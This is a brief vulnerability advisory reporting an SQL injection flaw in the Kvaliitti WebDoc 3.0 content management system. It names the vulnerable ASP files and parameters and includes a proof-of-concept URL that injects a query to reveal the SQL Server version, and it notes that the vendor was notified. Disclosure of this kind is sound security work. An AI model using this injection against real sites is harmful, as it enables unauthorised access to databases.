|
Found by: Jaakko "Chrysalid" Hartikainen=0D
=0D
1. Info=0D
=0D
Kvaliitti WebDoc 3.0 CMS is a proprietary Finnish-made content management system developed by Kvaliitti Oy (http://www.kvaliitti.fi). It is driven by MS SQL Server and ASP. =0D
=0D
2. Abstract=0D
=0D
WebDoc 3.0 suffers from a flaw in input validation, which allows attackers to insert malicious SQL queries into an existing one, possibly gaining complete control over an affected system.=0D
=0D
3. Vulnerable files & PoC:=0D
=0D
categories.asp, subcategory.asp, document_id, cat_id=0D
=0D
This proof of concept example exposes the internal server variable called "@@version":=0D
=0D
http://www.vulnerable.tld/categories.asp?document_id=37&cat_id=convert(int,(select+@@version));-- =0D
=0D
4. Misc=0D
=0D
Vendor notified: yes=0D
=0D
-- =0D